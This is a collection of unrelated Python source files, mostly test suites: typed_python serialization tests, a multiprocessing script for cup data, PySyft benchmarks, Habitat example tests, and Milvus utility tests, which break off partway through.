" @staticmethod\n"
" @Entrypoint\n"
" def anF():\n"
" return C\n"
)
with open(path, "w") as f:
f.write(CONTENTS)
globals = {'__file__': path}
exec(
compile(CONTENTS, path, "exec"),
globals
)
s = SerializationContext()
return s.serialize(globals['C'])
serializedC = callFunctionInFreshProcess(makeC, ())
C = SerializationContext().deserialize(serializedC)
assert C.anF() is C
assert C.anF.overloads[0].methodOf.Class is C
def test_serialization_independent_of_whether_function_is_hashed(self):
s = SerializationContext().withoutLineInfoEncoded().withoutCompression()
s1 = s.serialize(moduleLevelFunctionUsedByExactlyOneSerializationTest)
identityHash(moduleLevelFunctionUsedByExactlyOneSerializationTest)
s2 = s.serialize(moduleLevelFunctionUsedByExactlyOneSerializationTest)
assert s1 == s2
def test_serialize_anonymous_class_with_defaults_and_nonempty(self):
class C1(Class):
x1 = Member(int, default_value=10, nonempty=True)
x2 = Member(str, default_value="10", nonempty=True)
x3 = Member(float, default_value=2.5)
x4 = Member(str, nonempty=True)
s = SerializationContext()
C2 = s.deserialize(s.serialize(C1))
assert C2.ClassMembers['x1'].type is int
assert C2.ClassMembers['x2'].type is str
assert C2.ClassMembers['x3'].type is float
assert C2.ClassMembers['x4'].type is str
assert C2.ClassMembers['x1'].isNonempty
assert C2.ClassMembers['x2'].isNonempty
assert not C2.ClassMembers['x3'].isNonempty
assert C2.ClassMembers['x4'].isNonempty
assert C2.ClassMembers['x1'].defaultValue == 10
assert C2.ClassMembers['x2'].defaultValue == "10"
assert C2.ClassMembers['x3'].defaultValue == 2.5
assert C2.ClassMembers['x4'].defaultValue is None
def test_serialize_unresolved_forward(self):
F = Forward("Hi")
T = NamedTuple(x=F)
s = SerializationContext()
T2 = s.deserialize(s.serialize(T))
assert T2.ElementTypes[0].__typed_python_category__ == "Forward"
def test_serialization_doesnt_starve_gil(self):
checkCount = [0]
serializeCount = [0]
contextSwaps = []
s = SerializationContext()
def loopThread():
t0 = time.time()
while time.time() - t0 < 1.0:
contextSwaps.append((0, time.time()))
checkCount[0] += 1
def serializeThread():
t0 = time.time()
while time.time() - t0 < 1.0:
contextSwaps.append((1, time.time()))
s.deserialize(s.serialize(moduleLevelRecursiveF))
serializeCount[0] += 1
threads = [threading.Thread(target=t) for t in [loopThread, serializeThread]]
for t in threads:
t.start()
for t in threads:
t.join()
contextSwaps = sorted(contextSwaps, key=lambda a: a[1])
contextSwaps = contextSwaps[:1] + [
contextSwaps[i] for i in range(1, len(contextSwaps))
if contextSwaps[i][0] != contextSwaps[i-1][0]
]
avgTimeHeld = {0: 0.0, 1: 0.0}
for i in range(1, len(contextSwaps)):
avgTimeHeld[contextSwaps[i-1][0]] += contextSwaps[i][1] - contextSwaps[i-1][1]
print("Time spent in python spin thread: ", avgTimeHeld[0], " over ", checkCount[0], " cycles")
print("Time spent in serialization thread:", avgTimeHeld[1], " over ", serializeCount[0], " cycles")
# verify that we are spending a reasonable amount of time in each thread. If
# we release the gil directly in 'deserialize' or 'serialize', then we'll end up
# starving the serialization thread because we only get the thread back every
# few milliseconds.
assert .1 <= avgTimeHeld[0] <= .9
assert .1 <= avgTimeHeld[1] <= .9
def test_serialization_context_names_for_pmap_functions(self):
from typed_python.lib.pmap import ensureThreads
sc = SerializationContext()
assert sc.nameForObject(type(ensureThreads)) is not None
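# A minimal sketch of the serialize/deserialize round trip that the tests above rely on;
# it assumes SerializationContext and TupleOf are the typed_python names imported at the
# top of this module, and it is illustrative rather than exhaustive.
def _roundtrip_sketch():
    sc = SerializationContext().withoutCompression()
    value = TupleOf(int)((1, 2, 3))
    data = sc.serialize(value)   # plain bytes, suitable for sending to another process
    assert sc.deserialize(data) == value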
|
dmax_set.py
|
#!/usr/bin/python
import os
import fnmatch
from multiprocessing import Process
import process_cup
def process_set(cups_dir, set_tag, idx_start, idx_stop, out_dir=".", zshift=0.0, sym_Y=False):
    """
    Process all shots for both collimators for a given cup tag
    Parameters
    ----------
    cups_dir: string
        location of the directories with shots for all cups for both collimators
    set_tag: string
        set tag (R8O3IL or similar)
    idx_start: int
        start cup index
    idx_stop: int
        stop cup index, inclusive, so cups are processed in the range [idx_start, idx_stop + 1)
    out_dir: string
        output directory (the "." default is an assumed placeholder)
    zshift: float
        cup Z shift relative to shot, mm (the 0.0 default is an assumed placeholder)
    sym_Y: bool
        flag forwarded unchanged to process_cup.process_cup
    """
sy = sym_Y
pps = []
for k in range(idx_start, idx_stop + 1):
cup_tag = "{}{:02d}".format(set_tag, k)
p = Process(target=process_cup.process_cup, args=(cups_dir, cup_tag, out_dir, zshift, sy)) # calls process_cup.process_cup(cups_dir, cup_tag, out_dir, zshift, sy)
p.start()
pps.append(p)
for p in pps:
p.join()
if __name__ == "__main__":
process_set("/home/sphinx/gcloud", "R8O1IS", 1, 9)
process_set("/home/sphinx/gcloud", "R8O2IM", 1, 10)
process_set("/home/sphinx/gcloud", "R8O3IL", 1, 9)
|
bench_test.py
|
"""
Define benchmark tests
"""
# stdlib
import atexit
from multiprocessing import Process
from multiprocessing import set_start_method
import os
import time
from typing import Any
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from ...syft.grid.duet.signaling_server_test import run
from ..pytest_benchmarks.benchmark_send_get_local_test import send_get_list_local
from ..pytest_benchmarks.benchmark_send_get_local_test import send_get_string_local
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import (
send_get_list_multiprocess,
)
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import (
send_get_string_multiprocess,
)
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import PORT
from ..pytest_benchmarks.benchmarks_functions_test import list_serde
from ..pytest_benchmarks.benchmarks_functions_test import string_serde
set_start_method("spawn", force=True)
KB = 2 ** 10
MB = 2 ** 20
LIST_TEMPLATE = "a" * (10 * KB)
@pytest.fixture(scope="module")
def signaling_server() -> Process:
print(f"creating signaling server on port {PORT}")
grid_proc = Process(target=run, args=(PORT,))
grid_proc.start()
def grid_cleanup() -> None:
print("stop signaling server")
grid_proc.terminate()
grid_proc.join()
atexit.register(grid_cleanup)
return grid_proc
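# The fixture above is module-scoped: one signaling server process is started for all
# of the multiprocess benchmarks in this file and is terminated via the atexit hook.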
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * MB, 100 * MB])
def test_string_serde(byte_size: int, benchmark: Any) -> None:
data = "a" * byte_size
benchmark.pedantic(string_serde, args=(data,), rounds=3, iterations=3)
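# benchmark.pedantic with rounds=3 and iterations=3 makes pytest-benchmark call the
# target a fixed 3 * 3 = 9 times instead of auto-calibrating the number of runs.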
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_list_serde(list_size: int, benchmark: Any) -> None:
data = [LIST_TEMPLATE] * list_size
benchmark.pedantic(list_serde, args=(data,))
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * KB, 100 * KB, MB, 10 * MB])
def test_duet_string_local(byte_size: int, benchmark: Any) -> None:
data = "a" * byte_size
duet = sy.VirtualMachine().get_root_client()
benchmark.pedantic(send_get_string_local, args=(data, duet), rounds=3, iterations=3)
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_duet_list_local(list_size: int, benchmark: Any) -> None:
data = [LIST_TEMPLATE] * list_size
duet = sy.VirtualMachine().get_root_client()
benchmark.pedantic(send_get_list_local, args=(data, duet), rounds=3, iterations=3)
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * KB, 100 * KB, MB, 10 * MB])
def test_duet_string_multiprocess(
byte_size: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = "a" * byte_size
benchmark.pedantic(
send_get_string_multiprocess, args=(data,), rounds=3, iterations=3
)
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_duet_list_multiprocess(
list_size: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = [LIST_TEMPLATE] * list_size
benchmark.pedantic(send_get_list_multiprocess, args=(data,), rounds=3, iterations=3)
@pytest.mark.skip
@pytest.mark.benchmark
@pytest.mark.parametrize(
"chunk_size,max_buffer",
[
(2 ** 14, 2 ** 18),
(2 ** 18, 2 ** 23),
(2 ** 18, 2 ** 24),
(2 ** 18, 2 ** 25),
],
)
def test_duet_chunk_size(
chunk_size: int, max_buffer: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = "a" * (60 * MB)
os.environ["DC_MAX_CHUNK_SIZE"] = str(chunk_size)
os.environ["DC_MAX_BUFSIZE"] = str(max_buffer)
benchmark.pedantic(
send_get_string_multiprocess, args=(data,), rounds=2, iterations=2
)
|
test_examples.py
|
import itertools
import multiprocessing
import runpy
import sys
from os import path as osp
import pytest
def run_main(*args):
    # patch sys.argv
sys.argv = list(args)
target = args[0]
    # run_path has one difference from invoking Python on the command line:
# if the target is a file (rather than a directory), it does not add its
# parent directory to sys.path. Thus, importing other modules from the
# same directory is broken unless sys.path is patched here.
if osp.isfile(target):
sys.path.insert(0, osp.dirname(target))
runpy.run_path(target, run_name="__main__")
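# e.g. run_main("examples/tutorials/nb_python/Habitat_Lab.py") runs that script much
# like `python examples/tutorials/nb_python/Habitat_Lab.py` would, with sys.argv and
# sys.path patched as above.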
def powerset(iterable):
s = list(iterable)
return itertools.chain.from_iterable(
itertools.combinations(s, r) for r in range(len(s) + 1)
)
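# e.g. powerset([1, 2]) yields (), (1,), (2,), (1, 2).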
def run_main_subproc(args):
    # This test needs to be done in its own process as there is the potential for
    # an OpenGL context clash otherwise
mp_ctx = multiprocessing.get_context("spawn")
proc = mp_ctx.Process(target=run_main, args=args)
proc.start()
proc.join()
assert proc.exitcode == 0
@pytest.mark.skipif(
not osp.exists(
"data/scene_datasets/habitat-test-scenes/skokloster-castle.glb"
)
or not osp.exists(
"data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
)
or not osp.exists("data/scene_datasets/coda/coda.glb"),
reason="Requires the habitat-test-scenes",
)
@pytest.mark.parametrize(
"args",
[
(
"examples/tutorials/nb_python/Habitat_Interactive_Tasks.py",
"--no-show-video",
"--no-make-video",
),
("examples/tutorials/nb_python/Habitat_Lab.py",),
],
)
def test_example_modules(args):
run_main_subproc(args)
|
test_utility.py
|
import threading
import pytest
from base.client_base import TestcaseBase
from base.utility_wrapper import ApiUtilityWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "utility"
default_schema = cf.gen_default_collection_schema()
default_int64_field_name = ct.default_int64_field_name
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
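# IVF_SQ8: an inverted-file index with 8-bit scalar quantization; nlist=64 is the
# number of cluster units and L2 selects Euclidean distance.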
default_dim = ct.default_dim
default_nb = ct.default_nb
num_loaded_entities = "num_loaded_entities"
num_total_entities = "num_total_entities"
class TestUtilityParams(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if isinstance(request.param, str):
pytest.skip("string is valid type for metric")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_value(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if not isinstance(request.param, str):
pytest.skip("Skip invalid type for metric")
yield request.param
@pytest.fixture(scope="function", params=["JACCARD", "Superstructure", "Substructure"])
def get_not_support_metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def get_support_metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition_names(self, request):
if isinstance(request.param, list):
if len(request.param) == 0:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
"""
******************************************************************
    # The following are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_collection with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_collection(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# elif not isinstance(c_name, str):
# self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items={ct.err_code: 1, ct.err_msg: "illegal"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_partition with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
p_name = cf.gen_unique_str(prefix)
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_name_invalid(self, get_invalid_partition_name):
"""
target: test has_partition with error partition name
method: input invalid name
expected: raise exception
"""
self._connect()
ut = ApiUtilityWrapper()
c_name = cf.gen_unique_str(prefix)
p_name = get_invalid_partition_name
if isinstance(p_name, str) and p_name:
ex, _ = ut.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_name_invalid(self, get_invalid_collection_name):
self._connect()
error = f'`collection_name` value {get_invalid_collection_name} is illegal'
self.utility_wrap.drop_collection(get_invalid_collection_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: error})
# TODO: enable
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections_using_invalid(self):
"""
target: test list_collections with invalid using
method: input invalid name
expected: raise exception
"""
self._connect()
using = "empty"
ut = ApiUtilityWrapper()
ex, _ = ut.list_collections(using=using, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_invalid_name(self, get_invalid_collection_name):
"""
target: test building_process
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.index_building_progress(c_name, check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# TODO: not support index name
@pytest.mark.tags(CaseLabel.L1)
def _test_index_process_invalid_index_name(self, get_invalid_index_name):
"""
target: test building_process
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.index_building_progress(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_invalid_name(self, get_invalid_collection_name):
"""
target: test wait_index
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.wait_for_index_building_complete(c_name,
# check_items={ct.err_code: 1,
# ct.err_msg: "Invalid collection name"})
@pytest.mark.tags(CaseLabel.L1)
def _test_wait_index_invalid_index_name(self, get_invalid_index_name):
"""
target: test wait_index
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.wait_for_index_building_complete(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_c_name", ["12-s", "12 s", "(mn)", "中文", "%$#"])
def test_loading_progress_invalid_collection_name(self, invalid_c_name):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(invalid_c_name)}
self.utility_wrap.loading_progress(invalid_c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_not_existed_collection_name(self):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "describe collection failed: can't find collection"}
self.utility_wrap.loading_progress("not_existed_name", check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #677")
def test_loading_progress_invalid_partition_names(self, get_invalid_partition_names):
"""
target: test loading progress with invalid partition names
method: input invalid partition names
expected: raise an exception
"""
collection_w = self.init_collection_general(prefix)[0]
partition_names = get_invalid_partition_names
err_msg = {ct.err_code: 0, ct.err_msg: "`partition_name_array` value {} is illegal".format(partition_names)}
collection_w.load()
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
    @pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_names", [[ct.default_tag], [ct.default_partition_name, ct.default_tag]])
def test_loading_progress_not_existed_partitions(self, partition_names):
"""
target: test loading progress with not existed partitions
method: input all or part not existed partition names
expected: raise exception
"""
collection_w = self.init_collection_general(prefix)[0]
log.debug(collection_w.num_entities)
collection_w.load()
err_msg = {ct.err_code: 1, ct.err_msg: f"partitionID of partitionName:{ct.default_tag} can not be found"}
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_collection_not_existed(self):
"""
target: test wait for loading
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_loading_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_partition_not_existed(self):
"""
target: test wait for loading
method: input partition not created before
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
self.utility_wrap.wait_for_loading_complete(
collection_w.name, partition_names=[ct.default_tag],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: f'partitionID of partitionName:{ct.default_tag} can not be find'})
def test_drop_collection_not_existed(self):
"""
        target: test drop a collection that does not exist
        method: drop a collection that was not created
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "describe collection failed: can't find collection:"}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_type(self, get_support_metric_field, get_invalid_metric_type):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_type
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "params value {{'metric': {}}} "
"is illegal".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_value(self, get_support_metric_field, get_invalid_metric_value):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_value
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_not_support_metric(self, get_support_metric_field, get_not_support_metric):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_not_support_metric
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_using(self, get_support_metric_field):
"""
target: test calculated distance with invalid using
method: input invalid using
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
using = "empty"
self.utility_wrap.calc_distance(op_l, op_r, params, using=using,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_not_match_dim(self):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type and value
expected: raise exception
"""
self._connect()
dim = 129
vector_l = cf.gen_vectors(default_nb, default_dim)
vector_r = cf.gen_vectors(default_nb, dim)
op_l = {"float_vectors": vector_l}
op_r = {"float_vectors": vector_r}
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Cannot calculate distance between "
"vectors with different dimension"})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_collection_before_load(self, get_support_metric_field):
"""
target: test calculated distance when entities is not ready
method: calculate distance before load
expected: raise exception
"""
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb,
is_index=True)
middle = len(insert_ids) // 2
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection {} was not "
"loaded into memory)".format(collection_w.name)})
class TestUtilityBase(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=[True, False])
def sqrt(self, request):
yield request.param
@pytest.fixture(scope="function", params=["L2", "IP"])
def metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["HAMMING", "TANIMOTO"])
def metric_binary(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
cw = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(cw.name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_created(self):
"""
target: test has_collection with collection name which is not created
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
_ = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_after_drop(self):
"""
        target: test has_collection with collection name dropped before
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_collection(c_name)
assert res is True
cw.drop()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition(self):
"""
target: test has_partition with partition name
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_not_created(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name not created before
        expected: False
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_after_drop(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name dropped
        expected: True before drop, False after the partition is dropped
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
cw = self.init_collection_wrap(name=c_name)
pw = self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
pw.drop()
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_default_partition(self):
"""
target: test has_partition with '_default' partition
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, ct.default_partition_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.list_collections()
assert c_name in res
# TODO: make sure all collections deleted
@pytest.mark.tags(CaseLabel.L1)
def _test_list_collections_no_collection(self):
"""
target: test list_collections
method: no collection created, list_collections
expected: length of the result equals to 0
"""
self._connect()
res, _ = self.utility_wrap.list_collections()
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_not_existed(self):
"""
target: test building_process
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.index_building_progress(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_empty(self):
"""
target: test building_process
method: input empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_insert_no_index(self):
"""
target: test building_process
method: insert 1 entity, no index created
expected: no exception raised
"""
nb = 1
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
error = {ct.err_code: 1, ct.err_msg: "no index is created"}
self.utility_wrap.index_building_progress(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_index(self):
"""
target: test building_process
method: 1.insert 1024 (because minSegmentSizeToEnableIndex=1024)
2.build(server does create index) and call building_process
expected: indexed_rows=0
"""
nb = 1024
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res['indexed_rows'] == 0
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
